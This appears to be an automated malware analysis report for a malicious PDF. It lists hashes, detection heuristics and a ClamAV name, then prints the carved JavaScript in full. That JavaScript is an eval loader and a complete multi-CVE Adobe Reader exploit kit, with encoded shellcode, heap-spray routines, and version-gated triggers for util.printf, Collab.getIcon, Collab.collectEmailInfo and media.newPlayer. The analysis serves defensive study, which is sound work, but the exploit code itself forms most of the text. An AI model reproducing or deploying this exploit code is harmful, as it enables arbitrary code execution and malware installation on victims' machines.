Malicious PDF — malware analysis report

Static analysis result for SHA-256 4042f3da07a93a50…

MALICIOUS

PDF

5.1 KB First seen: 2026-05-08
MD5: 82adfae351ac59b96bb63f162f249245 SHA-1: 32894252b9f70b2c84233f4011ebcb959c14f25a SHA-256: 4042f3da07a93a50f1ad40a4e9435a1cad73ec1673b477bbf6150abb1a3dd1ef
468 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x1179 93 bytes
SHA-256: 61b46047f90b888a00e497def64b956f6da2cb6e69e8905a21e0ba446aa10cd0
Preview script
First 1,000 lines of the extracted script
m1=this.info.gkds;m2=m1.replace(/zzzzz/g,"");m3=this.info.gggsd+"al";        app[m3](m2);
info_stride_js_000.js deobfuscated-js PDF /Info fields via stride 6 8386 bytes
SHA-256: c4af40a400b5e719e43fa2986832a24305be4fa33cb30fc4468ebe62df630cdb
Detection
ClamAV: Pdf.Exploit.Agent-35646
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function hddd(fff)
{
   return fff.split("**").join("%"+"u");
}
shcode_geticon = hddd("**11EB**4B5B**C933**8166**AFC9**8001**0B34**E2A6**EBFA**E805**FFEA**FFFF**7C4F**A6A6**F9A6**07C2**A696**A6A6**E62D**2DAA**BAD6**2D0B**AECE**D62D**2D86**26A6**CD98**55D3**E0E0**9826**D3C3**E04A**26E0**D498**51D3**E0E0**9826**D3C8**2D56**CC51**FFA5**FD4E**A6A6**44A6**CE5F**C8C9**A6A6**D3CE**CAD4**F2CB**B059**4E2D**E34E**A6A6**CEA6**95CA**A694**D5CE**C3CE**F2CA**B059**4E2D**974E**A6A6**25A6**E64A**7A2D**CCF5**59E6**A2F0**A261**C7A5**C388**C0DE**E261**A2A5**A6C3**6695**F6F6**F1F5**59F6**AAF0**7A2D**F6F6**F5F6**F6F6**F059**59B6**AEF0**F0F7**D32D**2D9A**88D2**A5DE**F053**D02D**A586**9553**EF6F**0BE7**63A5**7D95**18A9**9CB6**D270**67AE**AB6D**7CA5**4DE6**9D57**D3B9**F841**F82D**A582**C07B**AA2D**2DED**BAF8**7BA5**A22D**A52D**0D63**FFF8**4E65**5987**5959**E828**4AA8**6C95**FD2C**7ED8**D544**BC90**D689**1DF8**BD47**D2CE**D6D2**899C**C289**D4C3**C2C9**C7CF**C588**88C9**C5C5**C889**C7C8**C2CD**89D1**C9C0**D3D4**88CB**CED6**99D6**9BC0**E2F6**86E0**E18E**D2C3**C5EF**C8C9**808F**C3CD**9BDF**C49F**9093**C094**95C7**C592**9FC3**9EC5**9693**C593**C3C4**C4C7**9F94**C596**C596**C09F**9092**D380**D49B**C9C9**A6D2");
shcode_newplayer = hddd("**11EB**4B5B**C933**8166**AFC9**8001**0B34**E2A6**EBFA**E805**FFEA**FFFF**7C4F**A6A6**F9A6**07C2**A696**A6A6**E62D**2DAA**BAD6**2D0B**AECE**D62D**2D86**26A6**CD98**55D3**E0E0**9826**D3C3**E04A**26E0**D498**51D3**E0E0**9826**D3C8**2D56**CC51**FFA5**FD4E**A6A6**44A6**CE5F**C8C9**A6A6**D3CE**CAD4**F2CB**B059**4E2D**E34E**A6A6**CEA6**95CA**A694**D5CE**C3CE**F2CA**B059**4E2D**974E**A6A6**25A6**E64A**7A2D**CCF5**59E6**A2F0**A261**C7A5**C388**C0DE**E261**A2A5**A6C3**6695**F6F6**F1F5**59F6**AAF0**7A2D**F6F6**F5F6**F6F6**F059**59B6**AEF0**F0F7**D32D**2D9A**88D2**A5DE**F053**D02D**A586**9553**EF6F**0BE7**63A5**7D95**18A9**9CB6**D270**67AE**AB6D**7CA5**4DE6**9D57**D3B9**F841**F82D**A582**C07B**AA2D**2DED**BAF8**7BA5**A22D**A52D**0D63**FFF8**4E65**5987**5959**E828**4AA8**6C95**FD2C**7ED8**D544**BC90**D689**1DF8**BD47**D2CE**D6D2**899C**C289**D4C3**C2C9**C7CF**C588**88C9**C5C5**C889**C7C8**C2CD**89D1**C9C0**D3D4**88CB**CED6**99D6**9BC0**E2F6**86E0**C88E**D1C3**CAF6**DFC7**D4C3**808F**C3CD**9BDF**C49F**9093**C094**95C7**C592**9FC3**9EC5**9693**C593**C3C4**C4C7**9F94**C596**C596**C09F**9092**D380**D49B**C9C9**A6D2");
shcode_printf = hddd("**11EB**4B5B**C933**8166**AFC9**8001**0B34**E2A6**EBFA**E805**FFEA**FFFF**7C4F**A6A6**F9A6**07C2**A696**A6A6**E62D**2DAA**BAD6**2D0B**AECE**D62D**2D86**26A6**CD98**55D3**E0E0**9826**D3C3**E04A**26E0**D498**51D3**E0E0**9826**D3C8**2D56**CC51**FFA5**FD4E**A6A6**44A6**CE5F**C8C9**A6A6**D3CE**CAD4**F2CB**B059**4E2D**E34E**A6A6**CEA6**95CA**A694**D5CE**C3CE**F2CA**B059**4E2D**974E**A6A6**25A6**E64A**7A2D**CCF5**59E6**A2F0**A261**C7A5**C388**C0DE**E261**A2A5**A6C3**6695**F6F6**F1F5**59F6**AAF0**7A2D**F6F6**F5F6**F6F6**F059**59B6**AEF0**F0F7**D32D**2D9A**88D2**A5DE**F053**D02D**A586**9553**EF6F**0BE7**63A5**7D95**18A9**9CB6**D270**67AE**AB6D**7CA5**4DE6**9D57**D3B9**F841**F82D**A582**C07B**AA2D**2DED**BAF8**7BA5**A22D**A52D**0D63**FFF8**4E65**5987**5959**E828**4AA8**6C95**FD2C**7ED8**D544**BC90**D689**1DF8**BD47**D2CE**D6D2**899C**C289**D4C3**C2C9**C7CF**C588**88C9**C5C5**C889**C7C8**C2CD**89D1**C9C0**D3D4**88CB**CED6**99D6**9BC0**E2F6**86E0**D68E**CFD4**D2C8**8FC0**CD80**DFC3**9F9B**93C4**9490**C7C0**9295**C3C5**C59F**939E**9396**C4C5**C7C3**94C4**969F**96C5**9FC5**92C0**8090**9BD3**C9D4**D2C9**00A6");
shcode_collab = hddd("**11EB**4B5B**C933**8166**AFC9**8001**0B34**E2A6**EBFA**E805**FFEA**FFFF**7C4F**A6A6**F9A6**07C2**A696**A6A6**E62D**2DAA**BAD6**2D0B**AECE**D62D**2D86**26A6**CD98**55D3**E0E0**9826**D3C3**E04A**26E0**D498**51D3**E0E0**9826**D3C8**2D56**CC51**FFA5**FD4E**A6A6**44A6**CE5F**C8C9**A6A6**D3CE**CAD4**F2CB**B059**4E2D**E34E**A6A6**CEA6**95CA**A694**D5CE**C3CE**F2CA**B059**4E2D**974E**A6A6**25A6**E64A**7A2D**CCF5**59E6**A2F0**A261**C7A5**C388**C0DE**E261**A2A5**A6C3**6695**F6F6**F1F5**59F6**AAF0**7A2D**F6F6**F5F6**F6F6**F059**59B6**AEF0**F0F7**D32D**2D9A**88D2**A5DE**F053**D02D**A586**9553**EF6F**0BE7**63A5**7D95**18A9**9CB6**D270**67AE**AB6D**7CA5**4DE6**9D57**D3B9**F841**F82D**A582**C07B**AA2D**2DED**BAF8**7BA5**A22D**A52D**0D63**FFF8**4E65**5987**5959**E828**4AA8**6C95**FD2C**7ED8**D544**BC90**D689**1DF8**BD47**D2CE**D6D2**899C**C289**D4C3**C2C9**C7CF**C588**88C9**C5C5**C889**C7C8**C2CD**89D1**C9C0**D3D4**88CB**CED6**99D6**9BC0**E2F6**86E0**E58E**CAC9**C7CA**8FC4**CD80**DFC3**9F9B**93C4**9490**C7C0**9295**C3C5**C59F**939E**9396**C4C5**C7C3**94C4**969F**96C5**9FC5**92C0**8090**9BD3**C9D4**D2C9**00A6");

function nplayer() {
function kzbve()
{
var eobwe="p@111111111111111111111111 : yyyy111";
util.printd(eobwe, new Date());
}

var grizxw=12000;
jucobu=new Array();
var klkng = "%u9090%u9090";
var hwjnalb8=shcode_newplayer;
klkng=unescape(klkng);
hwjnalb8=unescape(hwjnalb8);

while(klkng.length <= 0x8000){klkng+=klkng;}
klkng=klkng.substr(0,0x8000 - hwjnalb8.length);
for(fzfwam=0;fzfwam<grizxw;fzfwam++) {jucobu[fzfwam]=klkng + hwjnalb8;}
if(grizxw){kzbve();kzbve();try {this.media.newPlayer(null);} catch(e) {}kzbve();}
}

function printf() {

var payload=unescape(shcode_printf);

var nop ="";
for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + payload;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize+heapblock.length;
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;

var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
util.printf("%45000f",num);
}

function geticon() {

var shellcode=unescape(shcode_geticon);

garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090"); 
headersize = 10;
acl = headersize+garbage.length;

while (nopblock.length<acl) nopblock+=nopblock;
fillblock = nopblock.substring(0, acl);
block = nopblock.substring(0, nopblock.length-acl);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<180;i++) memory[i] = block + garbage;
var buffersize = 4012;
var buffer = Array(buffersize);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("%0a%0a%0a%0a");
}

Collab.getIcon(buffer+"_N.bundle");
}

function collab() {

function fix_it(yarsp,len) {
while(yarsp.length*2<len) { yarsp+=yarsp; }
yarsp=yarsp.substring(0,len/2);
return yarsp; }
var shellcode=unescape(shcode_collab);
var mem_array=new Array();
var cc=0x0c0c0c0c;
var addr=0x400000;
var sc_len=shellcode.length*2;
var len=addr-(sc_len+0x38);
var yarsp=unescape("%u9090%u9090");
yarsp=fix_it(yarsp,len);
var count2=(cc-0x400000)/addr;
for(var count=0;count<count2;count++) {mem_array[count]=yarsp+shellcode; }
var overflow=unescape("%u0c0c%u0c0c");
while(overflow.length<44952) {overflow+=overflow; }
this.collabStore=Collab.collectEmailInfo( { subj:"",msg:overflow } ); 

}

aPlugins = app.plugIns;
var sv=parseInt(app.viewerVersion.toString().charAt(0));
for (var i=0; i < aPlugins.length; i++)
  {
    if (aPlugins[i].name=="EScript")
      {
        var lv=aPlugins[i].version;
      }
  }  
if ((lv==9)||((sv==8)&&(lv<=8.12)))
  {
    geticon();
  }
else if (lv==7.1)
  {
    printf();
  }
else if (((sv==6)||(sv==7))&&(lv<7.11))
  {
    collab();
  }
else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))
  {
        nplayer();
  }

Open this report in the interactive analyzer, or submit your own file for analysis.